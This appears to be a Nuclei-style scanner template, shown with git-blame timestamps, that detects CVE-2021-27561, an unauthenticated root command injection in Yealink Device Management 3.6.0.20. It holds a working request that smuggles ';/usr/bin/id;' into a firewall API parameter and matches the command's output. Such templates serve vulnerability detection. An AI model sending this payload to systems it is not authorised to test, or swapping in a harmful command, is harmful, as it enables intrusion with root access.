2021-08-02 12:55:13 +00:00
id : CVE-2021-27561
info :
2022-05-18 20:58:07 +00:00
name : YeaLink DM 3.6.0.20 - Remote Command Injection
2021-08-02 12:55:13 +00:00
author : shifacyclewala,hackergautam
severity : critical
2022-05-18 20:58:07 +00:00
description : Yealink Device Management (DM) 3.6.0.20 allows command injection as root via the /sm/api/v1/firewall/zone/services URI, without authentication.
2022-04-22 10:38:41 +00:00
reference :
- https://ssd-disclosure.com/ssd-advisory-yealink-dm-pre-auth-root-level-rce/
2022-05-18 20:58:07 +00:00
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-27561
2022-05-18 21:10:42 +00:00
- https://ssd-disclosure.com/?p=4688
2021-10-22 09:40:47 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-10-22 09:40:47 +00:00
cve-id : CVE-2021-27561
cwe-id : CWE-77
2022-07-21 17:18:22 +00:00
tags : cve,cve2021,rce,yealink,mirai,kev
2021-08-02 12:55:13 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"
matchers-condition : and
matchers :
- type : word
condition : and
part : body
words :
- 'uid'
- 'gid'
- 'groups'
- type : word
part : header
words :
- 'application/json'
- type : status
status :
- 200
extractors :
- type : regex
regex :
- "(u|g)id=.*"
2022-05-18 20:58:07 +00:00
# Enhanced by mp on 2022/05/17